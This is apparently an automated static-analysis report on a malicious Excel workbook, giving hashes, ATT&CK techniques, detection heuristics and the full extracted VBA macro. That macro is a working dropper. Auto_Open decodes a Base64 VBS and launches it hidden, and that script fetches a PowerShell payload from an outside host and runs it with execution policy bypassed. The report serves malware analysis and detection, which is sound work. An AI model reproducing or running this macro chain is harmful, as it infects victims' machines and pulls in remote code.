Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 972b598d709b66b3…

MALICIOUS

Office (OLE)

524.5 KB Created: 2008-02-22 01:34:36 Authoring application: Microsoft Excel First seen: 2019-02-10
MD5: d253d65adf4285fa5004cd96e647a11f SHA-1: 1983b60d923b01fcb14ba813532b2f41f2d6c2fe SHA-256: 972b598d709b66b35900dc21c5225e5f0d474f241fefa890b381089afd7d44ee
390 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The file contains VBA macros with an Auto_Open subroutine that uses WScript.Shell to execute a command. This command is a Base64-decoded stager that downloads a payload from 'http://www.energydona'. The presence of Shell() and CreateObject calls, together with the Base64-decoded stager, strongly indicates downloader or dropper functionality.

Heuristics 10

  • ClamAV: Doc.Dropper.Agent-6372756-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6372756-0
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        command = "wscript.exe c:\\Users\\Public\\Documents\\Proxy.vbs"
        Set shell = CreateObject("WScript.Shell")
        shell.Run command, 0
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
    LOLBin reference in VBA
    Matched line in script
        command = "wscript.exe c:\\Users\\Public\\Documents\\Proxy.vbs"
        Set shell = CreateObject("WScript.Shell")
  • VBA Base64-decoded Shell command stager critical OLE_VBA_BASE64_SHELL_COMMAND_STAGER
    VBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.
    Matched line in script
        Dim oXML, oNode
        Set oXML = CreateObject("Msxml2.DOMDocument.3.0")
        Set oNode = oXML.CreateElement("base64")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Dim oXML, oNode
        Set oXML = CreateObject("Msxml2.DOMDocument.3.0")
        Set oNode = oXML.CreateElement("base64")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
        Dim strContent, strContent1, strContent2
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.energydona Referenced by macro
    • http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
    • http://ns.adobe.com/iX/1.0/ In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8409 bytes
SHA-256: 56e147c073e4cd72aea7df7f3899aa9e091a50e154f13cf4792222b82abdbc3f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Chart3"
Attribute VB_Base = "0{00020821-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Chart4"
Attribute VB_Base = "0{00020821-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Chart5"
Attribute VB_Base = "0{00020821-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Chart6"
Attribute VB_Base = "0{00020821-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"

Attribute VB_Name = "Module2"
Sub DropDown21_Change()
    ' Dropdown handler: reads the language selector in Sheet1!X1 and refreshes the
    ' displayed ranges and the sheet/chart captions for that language. The body is
    ' compiled out on Mac. This routine is ordinary workbook UI code; it does not
    ' take part in the dropper logic in Auto_Open.
    #If Not Mac Then
        Dim selectedLang, captionCol
        selectedLang = Int(Sheet1.Range("X1"))

        Select Case selectedLang
            Case 2
                ShowData "AD1:AV23", "B3:T25"
                ShowData2 "AL1:AN52", "B1:D52"
                captionCol = "z"
            Case Else
                ShowData "AD27:AV48", "B3:O22"
                ShowData2 "AG1:AI52", "B1:D52"
                captionCol = "y"
        End Select

        ' Captions for the six document objects are kept in Sheet1!<col>1..<col>6,
        ' column "z" for language 2 and column "y" otherwise.
        Sheet1.Name = Sheet1.Range(captionCol & "1").Value
        Sheet2.Name = Sheet1.Range(captionCol & "2").Value
        Chart3.Name = Sheet1.Range(captionCol & "3").Value
        Chart4.Name = Sheet1.Range(captionCol & "4").Value
        Chart5.Name = Sheet1.Range(captionCol & "5").Value
        Chart6.Name = Sheet1.Range(captionCol & "6").Value
    #End If
End Sub

Sub ShowData(Rng, Target_Rng)
    ' Copies the cell values of source range Rng onto Target_Rng, both on Sheet1
    ' (values only: the .Value assignment carries no formulas or formatting).
    With Sheet1
        .Range(Target_Rng).Value = .Range(Rng).Value
    End With
End Sub

Sub ShowData2(Rng, Target_Rng)
    ' Same as ShowData but operating on Sheet2: copies the cell values of Rng
    ' onto Target_Rng (values only).
    With Sheet2
        .Range(Target_Rng).Value = .Range(Rng).Value
    End With
End Sub


Function Base64Decode(sText)
    ' Decodes a Base64 string without any explicit encoding API: an MSXML DOM
    ' element whose DataType is "bin.base64" performs the decode when its Text
    ' is assigned, and nodeTypedValue then yields the raw bytes. Those bytes are
    ' converted to a String by Stream_BinaryToString (ADODB.Stream) below.
    ' This is the decode step behind the report's
    ' OLE_VBA_BASE64_SHELL_COMMAND_STAGER finding: the only caller, Auto_Open,
    ' writes the result to disk and launches it. The MSXML + ADODB.Stream pair
    ' in an auto-exec macro is a good detection anchor on its own.
    ' sText: Base64 text. Returns: decoded text.
    Dim oXML, oNode
    Set oXML = CreateObject("Msxml2.DOMDocument.3.0")
    Set oNode = oXML.CreateElement("base64")
    oNode.DataType = "bin.base64"
    oNode.Text = sText
    Base64Decode = Stream_BinaryToString(oNode.nodeTypedValue)
    Set oNode = Nothing
    Set oXML = Nothing
End Function

Function Stream_BinaryToString(Binary)
  ' Converts a byte array to a String through ADODB.Stream: the bytes are
  ' written in binary mode (Type = 1), the stream is rewound, switched to text
  ' mode (Type = 2) with the us-ascii charset, and read back with ReadText.
  ' Helper for Base64Decode; the decoded bytes are the dropped VBS source, so
  ' the charset choice reflects that the payload is plain ASCII script text.
  ' Binary: byte array (nodeTypedValue of an MSXML bin.base64 node).
  ' Returns: the bytes interpreted as us-ascii text.
  Const adTypeText = 2
  Const adTypeBinary = 1
  Dim BinaryStream 'As New Stream
  Set BinaryStream = CreateObject("ADODB.Stream")
  BinaryStream.Type = adTypeBinary
  BinaryStream.Open
  BinaryStream.Write Binary
  BinaryStream.Position = 0
  BinaryStream.Type = adTypeText
  BinaryStream.Charset = "us-ascii"
  Stream_BinaryToString = BinaryStream.ReadText
  Set BinaryStream = Nothing
End Function

Sub Auto_Open()
    ' Auto-exec entry point: runs when the workbook is opened with macros
    ' enabled (flagged OLE_VBA_AUTO). Dropper logic: rebuild a Base64 payload
    ' from two string literals, decode it, write the result as a .vbs file under
    ' the Public profile, and launch it hidden via WScript.Shell. This macro
    ' performs no network activity itself; the downloading is done by the
    ' dropped script (see the report's Malware Insights).
    Dim strContent, strContent1, strContent2
    Dim shell, command
    ' objFileToRead and strKey are declared but never used in this routine.
    Dim objFileToRead, objFileToWrite
    Dim strKey

    ' Stage text, Base64-encoded and split across two variables plus line
    ' continuations. The split explains why the report's extracted URL stops at
    ' "energydona": olevba pulled the URL from the first literal, which is cut at
    ' the continuation boundary; the rest of the host and path sit in the next
    ' chunk. Decoding strContent1 & strContent2 (done during review; confirm with
    ' an independent decode before using as IoCs) shows the dropped VBS fetches
    ' http://www.energydonate.com/images/character.gif with WinHttp, stores it as
    ' ProxyAutoUpdate.ps1 in the same Public\Documents folder, and runs it with a
    ' hidden, execution-policy-bypassing powershell.exe.
    strContent1 = "RGltIHNoZWxsLGNvbW1hbmQNCkhUVFBEb3dubG9hZCAiaHR0cDovL3d3dy5lbmVyZ3lkb25h" & _
                "dGUuY29tL2ltYWdlcy9jaGFyYWN0ZXIuZ2lmIiwgIkM6XFxVc2Vyc1xcUHVibGljXFxEb2N1" & _
                "bWVudHNcXFByb3h5QXV0b1VwZGF0ZS5wczEiDQoNClN1YiBIVFRQRG93bmxvYWQoIG15VVJM" & _
                "LCBteVBhdGggKQ0KJyBUaGlzIFN1YiBkb3dubG9hZHMgdGhlIEZJTEUgc3BlY2lmaWVkIGlu" & _
                "IG15VVJMIHRvIHRoZSBwYXRoIHNwZWNpZmllZCBpbiBteVBhdGguDQonDQonIG15VVJMIG11" & _
                "c3QgYWx3YXlzIGVuZCB3aXRoIGEgZmlsZSBuYW1lDQonIG15UGF0aCBtYXkgYmUgYSBkaXJl" & _
                "Y3Rvcnkgb3IgYSBmaWxlIG5hbWU7IGluIGVpdGhlciBjYXNlIHRoZSBkaXJlY3RvcnkgbXVz" & _
                "dCBleGlzdA0KJw0KJyBXcml0dGVuIGJ5IFJvYiB2YW4gZGVyIFdvdWRlDQonIGh0dHA6Ly93" & _
                "d3cucm9idmFuZGVyd291ZGUuY29tDQonDQonIEJhc2VkIG9uIGEgc2NyaXB0IGZvdW5kIG9u" & _
                "IHRoZSBUaGFpIFZpc2EgZm9ydW0NCicgaHR0cDovL3d3dy50aGFpdmlzYS5jb20vZm9ydW0v" & _
                "aW5kZXgucGhwP3Nob3d0b3BpYz0yMTgzMg0KDQogICAgJyBTdGFuZGFyZCBob3VzZWtlZXBp" & _
                "bmcNCiAgICBEaW0gaSwgb2JqRmlsZSwgb2JqRlNPLCBvYmpIVFRQLCBzdHJGaWxlLCBzdHJN" & _
                "c2cNCiAgICBDb25zdCBGb3JSZWFkaW5nID0gMSwgRm9yV3JpdGluZyA9IDIsIEZvckFwcGVu" & _
                "ZGluZyA9IDgNCg0KICAgICcgQ3JlYXRlIGEgRmlsZSBTeXN0ZW0gT2JqZWN0DQogICAgU2V0" & _
                "IG9iakZTTyA9IENyZWF0ZU9iamVjdCggIlNjcmlwdGluZy5GaWxlU3lzdGVtT2JqZWN0IiAp" & _
                "DQoNCiAgICAnIENoZWNrIGlmIHRoZSBzcGVjaWZpZWQgdGFyZ2V0IGZpbGUgb3IgZm9sZGVy"
    strContent2 = "IGV4aXN0cywNCiAgICAnIGFuZCBidWlsZCB0aGUgZnVsbHkgcXVhbGlmaWVkIHBhdGggb2Yg" & _
                "dGhlIHRhcmdldCBmaWxlDQoJSWYgb2JqRlNPLkZpbGVFeGlzdHMoIG15UGF0aCApIFRoZW4N" & _
                "CgkJRXhpdCBTdWINCglFbmQgSWYNCgkNCiAgICBJZiBvYmpGU08uRm9sZGVyRXhpc3RzKCBt" & _
                "eVBhdGggKSBUaGVuDQogICAgICAgIHN0ckZpbGUgPSBvYmpGU08uQnVpbGRQYXRoKCBteVBh" & _
                "dGgsIE1pZCggbXlVUkwsIEluU3RyUmV2KCBteVVSTCwgIi8iICkgKyAxICkgKQ0KICAgIEVs" & _
                "c2VJZiBvYmpGU08uRm9sZGVyRXhpc3RzKCBMZWZ0KCBteVBhdGgsIEluU3RyUmV2KCBteVBh" & _
                "dGgsICJcIiApIC0gMSApICkgVGhlbg0KICAgICAgICBzdHJGaWxlID0gbXlQYXRoDQogICAg" & _
                "RWxzZQ0KICAgICAgICBFeGl0IFN1Yg0KICAgIEVuZCBJZg0KDQogICAgJyBDcmVhdGUgb3Ig" & _
                "b3BlbiB0aGUgdGFyZ2V0IGZpbGUNCiAgICBTZXQgb2JqRmlsZSA9IG9iakZTTy5PcGVuVGV4" & _
                "dEZpbGUoIHN0ckZpbGUsIEZvcldyaXRpbmcsIFRydWUgKQ0KDQogICAgJyBDcmVhdGUgYW4g" & _
                "SFRUUCBvYmplY3QNCiAgICBTZXQgb2JqSFRUUCA9IENyZWF0ZU9iamVjdCggIldpbkh0dHAu" & _
                "V2luSHR0cFJlcXVlc3QuNS4xIiApDQoNCiAgICAnIERvd25sb2FkIHRoZSBzcGVjaWZpZWQg" & _
                "VVJMDQogICAgb2JqSFRUUC5PcGVuICJHRVQiLCBteVVSTCwgRmFsc2UNCiAgICBvYmpIVFRQ" & _
                "LlNlbmQNCg0KICAgICcgV3JpdGUgdGhlIGRvd25sb2FkZWQgYnl0ZSBzdHJlYW0gdG8gdGhl" & _
                "IHRhcmdldCBmaWxlDQogICAgRm9yIGkgPSAxIFRvIExlbkIoIG9iakhUVFAuUmVzcG9uc2VC" & _
                "b2R5ICkNCiAgICAgICAgb2JqRmlsZS5Xcml0ZSBDaHIoIEFzY0IoIE1pZEIoIG9iakhUVFAu" & _
                "UmVzcG9uc2VCb2R5LCBpLCAxICkgKSApDQogICAgTmV4dA0KDQogICAgJyBDbG9zZSB0aGUg" & _
                "dGFyZ2V0IGZpbGUNCiAgICBvYmpGaWxlLkNsb3NlKCApDQpFbmQgU3ViDQoNCmNvbW1hbmQg" & _
                "PSAicG93ZXJzaGVsbC5leGUgLVdpbmRvd1N0eWxlIEhpZGRlbiAtZXAgQnlwYXNzIC1Ob0xv" & _
                "Z28gLU5vUHJvZmlsZSAtZmlsZSBDOlxcVXNlcnNcXFB1YmxpY1xcRG9jdW1lbnRzXFxQcm94" & _
                "eUF1dG9VcGRhdGUucHMxIg0Kc2V0IHNoZWxsID0gQ3JlYXRlT2JqZWN0KCJXU2NyaXB0LlNo" & _
                "ZWxsIikNCnNoZWxsLlJ1biBjb21tYW5kLDA="
    ' Reassemble and decode (MSXML bin.base64 -> ADODB.Stream text, see helpers).
    strContent = strContent1 + strContent2
    strContent = Base64Decode(strContent)
    ' Drop the decoded script. OpenTextFile mode 2 = ForWriting, third argument
    ' True = create if missing, so the file is (re)written on every open. VBA
    ' does no backslash escaping, so the path literal really contains doubled
    ' separators; Windows path handling appears to tolerate that (verify), and
    ' the exact string is a useful match for file-create telemetry from Office.
    Set objFileToWrite = CreateObject("Scripting.FileSystemObject").OpenTextFile("c:\\Users\\Public\\Documents\\Proxy.vbs", 2, True)
    objFileToWrite.Write (strContent)
    objFileToWrite.Close
    
    ' Execute the dropped file with wscript.exe; Run's second argument 0 hides
    ' the window. Detection anchors: the Office process spawning wscript.exe
    ' with a Public\Documents\*.vbs argument, and that script in turn spawning
    ' powershell.exe (T1059.005 -> T1105 chain per the report's ATT&CK mapping).
    command = "wscript.exe c:\\Users\\Public\\Documents\\Proxy.vbs"
    Set shell = CreateObject("WScript.Shell")
    shell.Run command, 0
End Sub